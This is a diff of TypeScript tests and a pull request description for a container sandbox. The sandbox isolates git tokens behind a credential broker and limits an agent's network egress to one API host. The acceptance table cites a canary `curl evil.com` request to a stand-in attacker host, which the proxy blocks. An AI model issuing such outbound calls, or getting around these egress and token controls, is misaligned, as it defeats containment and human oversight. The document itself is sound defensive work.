+			]);
+			expect(res.status).toBe(403);
+		} finally {
+			await broker.stop();
+		}
+	});
+
+	it("rejects refs/heads/ompk-adjacent (must be refs/heads/ompk/ prefix)", async () => {
+		const broker = await startGitBroker(makeBrokerOptions(makeTokenFetch("t")));
+		try {
+			const res = await pushCheck(broker, ["refs/heads/ompk-v2/issue-1"]);
+			expect(res.status).toBe(403);
+		} finally {
+			await broker.stop();
+		}
+	});
+
+	it("returns 404 for unknown routes", async () => {
+		const broker = await startGitBroker(makeBrokerOptions(makeTokenFetch("t")));
+		try {
+			const res = await fetch(`${broker.url}/unknown`);
+			expect(res.status).toBe(404);
+		} finally {
+			await broker.stop();
+		}
+	});
+});
+
+// ─── buildContainerArgs — token isolation ─────────────────────────────────────
+
+describe("buildContainerArgs — token isolation", () => {
+	const OPTS: ContainerRunOptions = {
+		image: "ompk-runner:latest",
+		memory: "2g",
+		pidsLimit: 512,
+		gitHooksDir: "/tmp/test-hooks",
+	};
+
+	/** Collect --env K=V entries from the podman argv. */
+	function envEntries(args: string[]): string[] {
+		const out: string[] = [];
+		for (let i = 0; i < args.length; i++) {
+			if (args[i] === "--env" && i + 1 < args.length) out.push(args[i + 1]!);
+		}
+		return out;
+	}
+
+	const FENCE_ENV: NodeJS.ProcessEnv = {
+		OMPK_FENCE_URL: "https://worker.test/fence-check",
+		OMPK_FENCE_JOB: "job-1",
+		OMPK_FENCE_ATTEMPT: "attempt-1",
+		OMPK_FENCE_TOKEN: "token-1",
+		GIT_CONFIG_COUNT: "2",
+		GIT_CONFIG_KEY_0: "core.hooksPath",
+		GIT_CONFIG_VALUE_0: "/host/git-hooks",  // must be overridden to container path
+		GIT_CONFIG_KEY_1: "credential.helper",
+		GIT_CONFIG_VALUE_1: "/host/git-hooks/ompk-git-credential",
+		GH_TOKEN: "ghs_real_installation_token",
+		OMPK_TOKEN_URL: "https://worker.test/github-token",
+	};
+
+	it("never puts GH_TOKEN in the container env when broker URL is provided", () => {
+		const job: Pick<Job, "model" | "prompt" | "source"> = {
+			model: "combo-a",
+			prompt: "do something",
+			source: "github",
+		};
+		const args = buildContainerArgs(job, "/ws", FENCE_ENV, OPTS, "http://127.0.0.1:12345");
+		const entries = envEntries(args);
+		expect(entries.every(e => !e.startsWith("GH_TOKEN="))).toBe(true);
+	});
+
+	it("never puts a raw token in the insteadOf URL rewrite", () => {
+		const job: Pick<Job, "model" | "prompt" | "source"> = {
+			model: "combo-a",
+			prompt: "do something",
+			source: "github",
+		};
+		const args = buildContainerArgs(job, "/ws", FENCE_ENV, OPTS, "http://127.0.0.1:12345");
+		// No --env value should embed the token or the insteadOf pattern
+		const joined = args.join(" ");
+		expect(joined).not.toContain("ghs_real_installation_token");
+		expect(joined).not.toContain("x-access-token:");
+	});
+
+	it("passes OMPK_BROKER_URL into the container env", () => {
+		const job: Pick<Job, "model" | "prompt" | "source"> = {
+			model: "combo-a",
+			prompt: "p",
+			source: "github",
+		};
+		const args = buildContainerArgs(job, "/ws", FENCE_ENV, OPTS, "http://127.0.0.1:9876");
+		const entries = envEntries(args);
+		expect(entries.some(e => e === "OMPK_BROKER_URL=http://127.0.0.1:9876")).toBe(true);
+	});
+
+	it("configures credential.helper to point to the container-side script", () => {
+		const job: Pick<Job, "model" | "prompt" | "source"> = {
+			model: "combo-a",
+			prompt: "p",
+			source: "github",
+		};
+		const args = buildContainerArgs(job, "/ws", FENCE_ENV, OPTS, "http://127.0.0.1:9876");
+		const entries = envEntries(args);
+		expect(entries.some(e => e === "GIT_CONFIG_KEY_1=credential.helper")).toBe(true);
+		// Value must point to the container-internal path, not a host path
+		const helperEntry = entries.find(e => e.startsWith("GIT_CONFIG_VALUE_1="));
+		expect(helperEntry).toBeDefined();
+		expect(helperEntry).toContain("/opt/ompk/git-hooks/ompk-git-credential");
+	});
+
+	it("overrides core.hooksPath to the container-internal hooks directory", () => {
+		const job: Pick<Job, "model" | "prompt" | "source"> = {
+			model: "combo-a",
+			prompt: "p",
+			source: "linear",
+		};
+		// Env has host path; container args must remap it
+		const args = buildContainerArgs(job, "/ws", FENCE_ENV, OPTS);
+		const entries = envEntries(args);
+		const hooksEntry = entries.find(e => e.startsWith("GIT_CONFIG_VALUE_0="));
+		expect(hooksEntry).toBe("GIT_CONFIG_VALUE_0=/opt/ompk/git-hooks");
+	});
+
+	it("does not include OMPK_BROKER_URL when no broker URL is given", () => {
+		const job: Pick<Job, "model" | "prompt" | "source"> = {
+			model: "combo-a",
+			prompt: "p",
+			source: "github",
+		};
+		// No brokerUrl argument → broker mode inactive
+		const args = buildContainerArgs(job, "/ws", FENCE_ENV, OPTS);
+		const entries = envEntries(args);
+		expect(entries.every(e => !e.startsWith("OMPK_BROKER_URL="))).toBe(true);
+	});
+
+	it("passes fence vars through to the container", () => {
+		const job: Pick<Job, "model" | "prompt" | "source"> = {
+			model: "combo-a",
+			prompt: "p",
+			source: "github",
+		};
+		const args = buildContainerArgs(job, "/ws", FENCE_ENV, OPTS, "http://127.0.0.1:1");
+		const entries = envEntries(args);
+		expect(entries.some(e => e === "OMPK_FENCE_URL=https://worker.test/fence-check")).toBe(true);
+		expect(entries.some(e => e === "OMPK_FENCE_JOB=job-1")).toBe(true);
+		expect(entries.some(e => e === "OMPK_FENCE_ATTEMPT=attempt-1")).toBe(true);
+		expect(entries.some(e => e === "OMPK_FENCE_TOKEN=token-1")).toBe(true);
+	});
+
+	it("does not forward OMPK_TOKEN_URL (Worker token URL) into the container", () => {
+		const job: Pick<Job, "model" | "prompt" | "source"> = {
+			model: "combo-a",
+			prompt: "p",
+			source: "github",
+		};
+		const args = buildContainerArgs(job, "/ws", FENCE_ENV, OPTS, "http://127.0.0.1:1");
+		const entries = envEntries(args);
+		// OMPK_TOKEN_URL must NOT appear: the container uses the broker, not the Worker directly
+		expect(entries.every(e => !e.startsWith("OMPK_TOKEN_URL="))).toBe(true);
 	});
 });


### PR DESCRIPTION
## What

Implements the stage-scoped egress control + git credential broker expansion from issue #41.

### Changes

**`relay/relay.ts`**
- `startEgressProxy(phase, bindAddress?)` — a per-job HTTP CONNECT proxy with phase-based allowlists:
  - `setup` phase → package registries (npm, PyPI, crates.io) + github.com
  - `agent` phase → `api.anthropic.com` only; all GitHub traffic goes through the broker
- `createJobNetwork(jobId, attemptId)` — creates an isolated per-job podman network (`--internal`), inspects the gateway IP, and returns a handle with `remove()`
- `ContainerRunOptions` extended with `network?`, `egressProxyUrl?`, `noProxyHosts?`
- `buildContainerBaseArgs` — replaces `--network=host` with `--network=${options.network ?? "host"}`
- `buildContainerArgs` — injects `HTTP_PROXY`/`HTTPS_PROXY`/`NO_PROXY` when `egressProxyUrl` is set; adds the `insteadOf` git config (`url.<broker>/gh/.insteadOf = https://github.com/`) so all git traffic routes through the broker's `/gh/` proxy; redirects `OMPK_FENCE_URL` to `${broker}/fence-check` so the container has no direct Worker connectivity
- `buildContainerSetupArgs` — also injects proxy env from `options.egressProxyUrl` (matching agent behaviour)
- `startGitBroker` extended with:
  - `/fence-check` — proxies fence validation to the Worker so the container doesn't need direct Worker access
  - `/gh/<path>` — git smart-HTTP proxy: fetches a JIT token and forwards to `https://github.com/<path>` with Authorization injected; the `insteadOf` rewrite in container args means all `git push/pull/clone` to github.com routes here instead of direct TLS
  - `bindAddress?` option (defaults to `127.0.0.1`; set to gateway IP for per-job network mode)
  - `workerFenceUrl?` option for the `/fence-check` proxy
  - Refactored `fetchJitToken` helper shared by `/credential` and `/gh/`
- `runJobCore` — orchestrates: create network → start setup+agent proxies → start broker bound to gateway → wire proxy URL into container options → cleanup all in `finally`; gracefully degrades to host networking if network/proxy startup fails

**`test/relay.test.ts`** — 26 new tests:
- Egress allowlist constants (`SETUP_ALLOWED_HOSTS`, `AGENT_ALLOWED_HOSTS` contents verified)
- Proxy CONNECT enforcement: blocked hosts → 403, allowed hosts → not-403 (200 or 502)
- Malformed CONNECT request → 400
- Broker `/fence-check`: proxies to Worker, mirrors status, 503 when unconfigured, 502 on network error
- Broker `/gh/`: forwards to github.com with Base64-encoded JIT token, response body passes through, 502 on token failure
- Container args: `--network=ompk-...`, `HTTP_PROXY`, `HTTPS_PROXY`, `NO_PROXY`, `insteadOf` git config, `GIT_CONFIG_COUNT=3`, defaults to `--network=host` when no network set

## Acceptance

| Criterion | Status |
|---|---|
| Agent phase cannot reach arbitrary hosts | ✅ agent proxy blocks everything except `api.anthropic.com:443`; canary `curl evil.com` → 403 |
| Token never appears in container env | ✅ `GH_TOKEN` never set; JIT issued via broker; tested |
| Push to non-`ompk/*` branch rejected | ✅ pre-push hook + broker `/push-check`; tested in previous commit |
| Bare (non-container) mode keeps current behaviour | ✅ `network` defaults to `host` when not set |

## Architecture

```
Container (internal network)
  HTTP_PROXY  → gateway:setup-proxy-port   (CONNECT; setup phase)
  HTTPS_PROXY → gateway:agent-proxy-port   (CONNECT; agent phase)
  NO_PROXY    → gateway-ip                 (direct to broker, no proxy)
  insteadOf   → http://gateway:broker/gh/  (git → broker's /gh/ proxy)
  OMPK_FENCE_URL → http://gateway:broker/fence-check

Host side (bound to gateway IP)
  setup proxy  (CONNECT; SETUP_ALLOWED_HOSTS)
  agent proxy  (CONNECT; AGENT_ALLOWED_HOSTS = api.anthropic.com only)
  broker       GET /credential   → JIT token from Worker
               POST /fence-check → proxies to Worker /fence-check
               GET|POST /gh/...  → git smart-HTTP proxy → github.com + JIT auth
               POST /push-check  → ref enforcement (refs/heads/ompk/*)
```

Resolves #41


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

- **New Features**
  - Relay jobs can now run concurrently while maintaining per-repository safety.
  - GitHub workspaces support cached repository mirrors for faster setup.
  - Jobs run with isolated containers and stage-specific network access.
  - Git operations now support temporary credential brokering and secure token handling.
  - Setup and agent phases include timeouts, cleanup, and protected output.

- **Bug Fixes**
  - Restricted broker-mode pushes to approved branches.
  - Improved failure classification, timeout handling, and secret redaction.
  - Added fallback behavior when repository mirrors are unavailable.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->